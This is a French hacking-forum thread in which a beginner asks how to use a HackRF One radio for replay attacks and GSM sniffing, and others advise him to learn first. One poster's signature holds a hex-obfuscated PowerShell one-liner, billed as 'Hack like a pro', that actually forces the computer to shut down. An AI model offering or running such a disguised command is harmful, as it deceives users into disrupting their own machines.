Annonce

Réduire
Aucune annonce.

Comment utiliser le hackrf one ?

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Comment utiliser le hackrf one ?

    Bonjour, j'aimerais en apprendre plus sur le hackrf one mais je n'y connais rien en onde radio... avez vous des lien pour que j'en apprennent un peut plus dessus car je voudrais en avoir un (de hackrf one) mais je ne sais pas trop se que je ferais avec sans aucune connaissance en sdr (j'aimerais beacoup apprendre l'attaque replay si possible ou bien le gsm sniffing) ps : j'utiliserait le hackrf en pentesting (hacking)
    Dernière modification par zark, 28 mars 2018, 18h13.

  • #2
    Disons que normalement, c'est le genre de joujou que t’achète quand t'as une bonne idée de ce que tu vas faire avec justement.
    Avant d'acheter un outil (à 300 balle qui plus est), tâche de savoir à quoi il va te servir, et comment tu pourras t'en servir.
    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Envoyé par Krisscool Voir le message
      Disons que normalement, c'est le genre de joujou que t’achète quand t'as une bonne idée de ce que tu vas faire avec justement.
      Avant d'acheter un outil (à 300 balle qui plus est), tâche de savoir à quoi il va te servir, et comment tu pourras t'en servir.
      J'ai justement envie de savoir se que je pourrais faire quand j'an aurais un. je connais juste une seul attaque (la "replay attack") que si j'ai bien compris permet de récuperer une "onde radio" et de la rejouer. Mais je ne sais pas se que l'on vas pouvoir faire d'autre avec un hackrf (dans le domaine du hacking, pentest) :/

      Commentaire


      • #4
        Unlocking cars, Record and replay, Sniffing GSM traffic,....
        Les didacticiels tournant autour de ce type de produit sont confinés et la plupart bien expliqué sont assez cher.

        Si tu n'a pas de projet particulier et encore plus si tu n'a pas de base sur le hacking, programmation,.... je ne vois pas l'intérêt d'acheter un appareil de ce prix là. Je te conseille d'apprendre d'autre truc gratuit ou alors d'investir dans d'autre produit

        Ce n'est pas le produit ou son prix qui va te faire pirater plus ou moins, j'ai des potes ils n'ont qu'un portable ou une tablette et pourtant ils font plus de dégâts que certain avec 4 pc et 20 écrans.

        Bonne chance et reconsidère ton achat sinon ben Va Google rechercher les attaques citées au-dessus

        Commentaire


        • #5
          Envoyé par DreAmuS Voir le message

          Si tu n'a pas de projet particulier et encore plus si tu n'a pas de base sur le hacking, programmation,.... je ne vois pas l'intérêt d'acheter un appareil de ce prix là. Je te conseille d'apprendre d'autre truc gratuit ou alors d'investir dans d'autre produit
          Je sais coder en python et un peut en c je connais des base du hacking aussi : reconnaissance , scanning web/resaux , metasploit , aircrack-ng , mitm , sniffing .... Mais tu a raison j'envisage plus d'acheter le wifi pineapple finalement
          Dernière modification par zark, 29 mars 2018, 16h55.

          Commentaire

          Chargement...
          X